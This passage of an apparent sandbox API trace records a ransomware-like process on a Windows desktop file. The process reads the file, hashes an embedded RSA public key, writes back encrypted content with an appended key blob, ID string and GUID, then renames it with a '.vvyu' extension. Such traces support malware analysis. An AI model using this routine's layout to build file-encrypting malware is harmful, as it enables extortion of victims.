"c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\tkvyxwxrq.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.857] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=51929) returned 1 [0195.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.860] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xcab3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.860] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.863] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.863] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xcad9, lpOverlapped=0x0) returned 1 [0195.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.864] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.864] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.864] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.865] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.865] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.865] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.865] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.865] GetLastError () returned 0x0 [0195.865] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.865] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.865] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.865] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.865] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcae0) returned 0x2ea79b0 [0195.866] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14a0 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0195.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.867] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0195.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d50 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.869] GetCurrentThreadId () returned 0x66c [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4c30 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.870] GetCurrentThreadId () returned 0x66c [0195.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0195.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0195.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0195.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea14a0 | out: hHeap=0x620000) returned 1 [0195.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.881] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xcad4, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xcad4, lpOverlapped=0x0) returned 1 [0195.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.882] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xcad9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.882] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0195.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0195.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.884] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0195.884] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.884] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.884] CloseHandle (hObject=0x568) returned 1 [0195.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0195.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.886] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\tkVyxwxrQ.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\tkvyxwxrq.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\tkVyxwxrQ.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\tkvyxwxrq.ots.vvyu")) returned 1 [0195.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 